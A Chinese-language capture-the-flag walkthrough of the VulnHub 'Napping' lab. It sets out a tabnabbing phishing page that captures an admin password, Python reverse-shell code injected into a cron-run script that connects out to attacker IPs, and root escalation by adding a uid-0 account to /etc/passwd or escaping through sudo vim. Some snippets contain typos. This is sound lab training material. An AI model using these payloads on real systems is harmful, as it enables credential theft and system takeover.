靶机练习No.5 VulnHub靶场 Napping

攻击机IP：192.168.43.86

主机发现：sudo nmap -sP 192.168.43.1/24

--> 目标IP: 192.168.43.91

端口扫描：sudo nmap -sC -sV -p- 192.168.43.91

--> 开放端口：22,80

浏览器访问80端口：登录页面，可以注册，注册一个账号：aa 密码：bbbbbb

--> 登录后跳转welcome.php页面  Blog Lnk: http://hao123.com

--> 点击here后回跳转到添加的链接，Here设置了a标签，target=_blank

target=_blank  --> 在新窗口中打开链接
target=_self  -->  在原窗口打开一个新页面

tabnnabing钓鱼原理：
使用正常网站A的a标签设置为恶意网站B，恶意网站B中利用window.opener修改原先页面A页面，进而无征兆把访问正常网站A页面修改为钓鱼网站C页面。
两个可以利用点：
1、使用a标签，并且target=_blank,没有使用rel="noopener/noreferrer"属性
2、使用window.open

在网站传输恶意页面nadding.html

<!DOCTYPE html>
<html>
<body>
    <script>
      if(window.opener) mainframe.location.replace=('http://192.168.43.118:7777/login.html');
      if(window.opener  != window) mainframe.location.replace=('http://192.168.43.118:7777/login.html');
</script>
</body>
</html>

需要使用python3开启http服务器：

python3 -m http.server 80

然后在攻击机上开启7777端口监听：nc -lvvp 7777

等待管理员检查的时候，会得到管理员的账号：daniel 密码：C@40ughtm3napping123

使用ssh连接服务器：ssh [email protected]

连接成功。

反弹shell：

find / -group administrators -type f 2>/dev/null

--> /home/adrian/query.py

cd /home/adrian

还有user.txt 和 site_status.txt两个文件夹

cat user.txt

--> Permission denied

查看query.py和site_status.txt：

--> query.py记录浏览站点状态的脚本，将信息记录到site_ststus.txt中。两分钟检查一次

修改query.py脚本，代码中加入反弹shell代码：

import socket,suprocess,os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.43.86',4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

python -c '
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.10.11",443));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/bash")'

在kali上开启监听4444端口：nc -lvvp 4444

过一段时间成功反弹shell

拿到完整交互shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL + Z
stty -a
stty raw -echo;fg
reset

提升权限：

方法一：添加root账户

查看用户权限：sudo -l

--> 显示以root身份运行不需要密码

添加管理员账号：
passwd账号格式：用户名:密码:uid:gid:注释:home目录:用户的shell
root账号的格式：root:0:0:root:/root:/bin/bash

生成密码：
openssl passwd -1 -salt aaa 123   
<!-- 使用生成密码登录时不成功，去掉salt 123生成的密码登陆成功 --!>
passwd生成密码
-1使用md5加密
-salt string加入随机数，最多8位

使用openssl生成密码：

openssl passwd -1 aaa

--> $1$D08M/VIx$aM/UxkkZsen01SUWhVdYt.

sudo vim /etc/passwd

最后一行加入：

aaa:$1$D08M/VIx$aM/UxkkZsen01SUWhVdYt.:0:0:/aaa:/bin/bash

su aaa   --> 登录创建的root用户，密码aaa

登陆成功！

方法二：使用vim-shell

写入vim-shell:

sudo /usr/bin/vim -c ':!/bin/sh'

得到root

whoami -> root

ls -> root.txt

cat root.txt

关注路劲科技，关注网络安全！

原文始发于微信公众号（北京路劲科技有限公司）：靶机练习No.5 VulnHub靶场 Napping